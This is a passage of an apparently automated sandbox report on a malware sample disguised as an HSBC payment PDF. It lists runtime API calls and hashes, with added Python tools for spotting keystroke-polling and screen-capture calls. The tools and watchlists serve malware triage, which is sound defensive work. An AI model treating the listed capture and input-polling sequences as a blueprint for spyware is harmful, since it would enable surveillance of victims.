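Similarity
• API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
• String ID: @$ThumbnailClass
• API String ID: 1788623398-1539354611
• Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
• Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
"""

SECTIONS = ("APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

# One API reference line; "Part of subcall function XXXXXXXX:" marks an indirect call.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})$"
)
# Generic "• Key: value" line in the non-API sections.
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?): (?P<val>.*)$")

# Assumed watchlist: APIs that poll or hook user input (illustrative only).
WATCHLIST = {"GetAsyncKeyState", "GetKeyState", "SetWindowsHookExW", "GetForegroundWindow"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple
    ref: int                    # address of the call site
    via_subcall: Optional[str]  # callee address when the call is indirect, else None


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def strings(self):
        """Joe Sandbox joins a function's referenced strings with '$'."""
        sid = self.fields.get("String ID")
        return sid.split("$") if sid else []

    def uses(self, api, include_subcalls=True):
        return any(c.name == api and (include_subcalls or c.via_subcall is None)
                   for c in self.calls)


def parse_listing(text):
    """Split the listing at each 'APIs' header and parse the lines under it."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":
                current = FunctionRecord()
                records.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = tuple(a for a in (m["args"] or "").split(",") if a)
                current.calls.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), m["sub"]))
        else:
            m = FIELD_RE.match(line)
            if m:
                current.fields[m["key"]] = m["val"].strip()
    return records


def triage(records, watchlist=WATCHLIST):
    """Map Opcode-ID prefix -> {api: 'direct' | 'subcall <addr>'} for functions touching the watchlist."""
    hits = {}
    for rec in records:
        found = {c.name: ("direct" if c.via_subcall is None else f"subcall {c.via_subcall}")
                 for c in rec.calls if c.name in watchlist}
        if found:
            hits[rec.fields.get("Opcode ID", "?")[:16]] = found
    return hits


def shared_opcode_ids(a, b):
    """Opcode IDs present in both listings, i.e. functions identical across two reports."""
    ids = lambda recs: {r.fields["Opcode ID"] for r in recs if "Opcode ID" in r.fields}
    return ids(a) & ids(b)


if __name__ == "__main__":
    recs = parse_listing(SAMPLE)
    for r in recs:
        print(r.fields.get("Opcode ID", "?")[:16], [c.name for c in r.calls], r.strings)
    print(triage(recs))
```

Run against a full listing, `triage` narrows hundreds of runtime functions to the few that reach input-polling APIs, and distinguishes a function that merely calls a helper (the GUI setup above, which reaches GetAsyncKeyState only via 00402344) from the helper itself. `shared_opcode_ids` applied to this report and a report on a clean AutoIt-compiled binary would mark the functions that are plain interpreter code, leaving the remainder for closer inspection.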
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• DragQueryPoint.SHELL32(?,?), ref: 0048C627
  • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
  • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
  • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
• SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
• _wcscat.LIBCMT ref: 0048C6EE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
• SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
• SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
• SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
• DragFinish.SHELL32(?), ref: 0048C75E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
• API String ID: 169749273-3863044002
• Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
• Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                                                                                                                                                    • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                                                                                                                                                    • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsnicmp
                                                                                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                    • API String ID: 1038674560-1810252412
                                                                                                                                                    • Opcode ID: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                                                                                                                    • Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
                                                                                                                                                    • Opcode Fuzzy Hash: a4b87119f2590ef0ff3b3c98b7eb3c6a6e3570d121fdce2df4e859d34895fad6
                                                                                                                                                    • Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E
                                                                                                                                                    APIs
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00475029
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00475055
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00475060
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00475076
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00475081
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00475097
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
                                                                                                                                                    • GetCursorInfo.USER32(?), ref: 004750C8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Cursor$Load$Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2577412497-0
                                                                                                                                                    • Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                                                                                    • Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
                                                                                                                                                    • Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
                                                                                                                                                    • Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 0048A259
                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 0048A2D3
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 0048A3A4
                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0048A40D
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0048A414
                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444
                                                                                                                                                      • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                    • API String ID: 1297703922-3619404913
                                                                                                                                                    • Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                                                                                    • Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
                                                                                                                                                    • Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
                                                                                                                                                    • Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00484424
                                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                    • API String ID: 3974292440-4258414348
                                                                                                                                                    • Opcode ID: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                                                                                                                    • Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
                                                                                                                                                    • Opcode Fuzzy Hash: d41169d53101f6065c28c3bc0dfba1111c846f283bff3c510c83ccf8dd002daa
                                                                                                                                                    • Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 0046A3CB
                                                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0046A418
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
                                                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
• Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
• Opcode Fuzzy Hash: 2433a39104dc5ffff93c95c3229acd57be7374fc48d04d6dc4c903e6b3cf77a9
• Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
• GetFocus.USER32 ref: 0048C20C
• GetDlgCtrlID.USER32(00000000), ref: 0048C217
• _memset.LIBCMT ref: 0048C342
• GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0048C36D
• GetMenuItemCount.USER32(?), ref: 0048C38D
• GetMenuItemID.USER32(?,00000000), ref: 0048C3A0
• GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0048C3D4
• GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0048C41C
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0048C454
• DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0048C489
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: 901300d993ba4ef79483208aca69c4f68d103eaf980791bed4d4ab6720b8591f
• Instruction ID: c475bcefc4ba02209658d373736a3052ec3262963195f5d7aee57ef1aaf8ece4
• Opcode Fuzzy Hash: 901300d993ba4ef79483208aca69c4f68d103eaf980791bed4d4ab6720b8591f
• Instruction Fuzzy Hash: 17818870608301AFD710EF24D894A7FBBE8EB88714F004D2EF99597291D778D945CBAA
APIs
• GetDC.USER32(00000000), ref: 0047738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
• CreateCompatibleDC.GDI32(?), ref: 004773A7
• SelectObject.GDI32(00000000,?), ref: 004773B4
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
• SelectObject.GDI32(00000006,?), ref: 00477470
• DeleteObject.GDI32(?), ref: 00477479
• DeleteDC.GDI32(00000006), ref: 00477480
• ReleaseDC.USER32(00000000,?), ref: 0047748B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: 9b840f603ca055cf69c59b17ce240dfc30cb433146a2e1f05c36ea0610a5c8fc
• Instruction ID: dfe8a3419fea5eebfe22a8fe4a62b6ec684acb784746aa6277c3acce6f7982dd
• Opcode Fuzzy Hash: 9b840f603ca055cf69c59b17ce240dfc30cb433146a2e1f05c36ea0610a5c8fc
• Instruction Fuzzy Hash: 5D515871904209EFCB14CFA8CC84EAFBBB9EF49310F14852EF959A7211D735A945CB54
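The GDI entry above (GetDC, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, then the matching Delete/Release calls) is the textbook screen-capture sequence: a screen DC is copied into an offscreen bitmap and the pixels are pulled out with GetDIBits. Triage of a long report like this one is easier when such chains are matched mechanically rather than by eye. The following is an added example, not Joe Sandbox code and not part of the sample: it parses the report's "• Name.MODULE(args), ref: ADDR" lines and does an ordered-subsequence match against a chain definition. The chain generalises slightly beyond this entry by also accepting GetWindowDC and BitBlt as alternatives; the sample input is the APIs block of this entry and, as a negative, a few lines of the dialog/menu entry, both copied from the report.

```python
import re
from typing import List, Optional, Sequence, Set, Tuple

# One parsed call line: (function, module, hex ref address, listed as "Part of subcall")
ApiCall = Tuple[str, str, str, bool]

# Matches the report's "• Name.MODULE(args), ref: ADDR" lines. The bullet and the
# argument list are optional; "Part of subcall function XXXX:" is captured as a flag.
_CALL_LINE = re.compile(
    r"(?:•\s*)?(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<fn>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})"
)


def parse_api_calls(text: str) -> List[ApiCall]:
    """Parse the APIs block of one function entry, preserving listing order."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _CALL_LINE.search(line)
        if m:
            calls.append((m["fn"], m["mod"], m["ref"].upper(), m["sub"] is not None))
    return calls


# Screen-capture chain: each step is a set of acceptable functions. GetWindowDC and
# BitBlt are accepted as alternatives to the GetDC/StretchBlt seen in this entry.
SCREEN_CAPTURE_CHAIN: Sequence[Set[str]] = [
    {"GetDC", "GetWindowDC"},
    {"CreateCompatibleBitmap"},
    {"CreateCompatibleDC"},
    {"SelectObject"},
    {"BitBlt", "StretchBlt"},
    {"GetDIBits"},
]


def find_chain(calls: Sequence[ApiCall], chain: Sequence[Set[str]],
               include_subcalls: bool = False) -> Optional[List[str]]:
    """Ordered-subsequence match: every step must occur after the previous one.
    Returns the ref addresses of the matched calls, or None if the chain is absent."""
    matched: List[str] = []
    step = 0
    for fn, _mod, ref, from_subcall in calls:
        if from_subcall and not include_subcalls:
            continue
        if fn in chain[step]:
            matched.append(ref)
            step += 1
            if step == len(chain):
                return matched
    return None


# Sample input: the APIs block of the GDI entry, copied from the report.
SCREENSHOT_ENTRY = """\
• GetDC.USER32(00000000), ref: 0047738F
• CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0047739B
• CreateCompatibleDC.GDI32(?), ref: 004773A7
• SelectObject.GDI32(00000000,?), ref: 004773B4
• StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00477408
• GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00477444
• GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00477468
• SelectObject.GDI32(00000006,?), ref: 00477470
• DeleteObject.GDI32(?), ref: 00477479
• DeleteDC.GDI32(00000006), ref: 00477480
• ReleaseDC.USER32(00000000,?), ref: 0047748B
"""

# Negative sample: the first lines of the dialog/menu entry, which use USER32 but take no screenshot.
MENU_ENTRY = """\
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0048C1FC
• GetFocus.USER32 ref: 0048C20C
• GetDlgCtrlID.USER32(00000000), ref: 0048C217
• _memset.LIBCMT ref: 0048C342
"""

if __name__ == "__main__":
    for label, entry in (("gdi entry", SCREENSHOT_ENTRY), ("menu entry", MENU_ENTRY)):
        hit = find_chain(parse_api_calls(entry), SCREEN_CAPTURE_CHAIN)
        print(label, "->", "screen capture at " + ", ".join(hit) if hit else "no match")
```

The matcher deliberately skips "Part of subcall" lines by default, because those are calls made by a callee, and a chain that is only complete across several functions is a weaker signal than one complete within a single function body. In an AutoIt runtime this chain is legitimate library code (pixel and screen functions), so a hit here says the capability is present, not that the script uses it; the script body, not the interpreter, is what decides that.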
APIs
  • Part of subcall function 00420957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406B0C,?,00008000), ref: 00420973
  • Part of subcall function 00404750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00404743,?,?,004037AE,?), ref: 00404770
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
• SetCurrentDirectoryW.KERNEL32(?), ref: 00406CFA
  • Part of subcall function 0040586D: _wcscpy.LIBCMT ref: 004058A5
  • Part of subcall function 0042363D: _iswctype.LIBCMT ref: 00423645
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
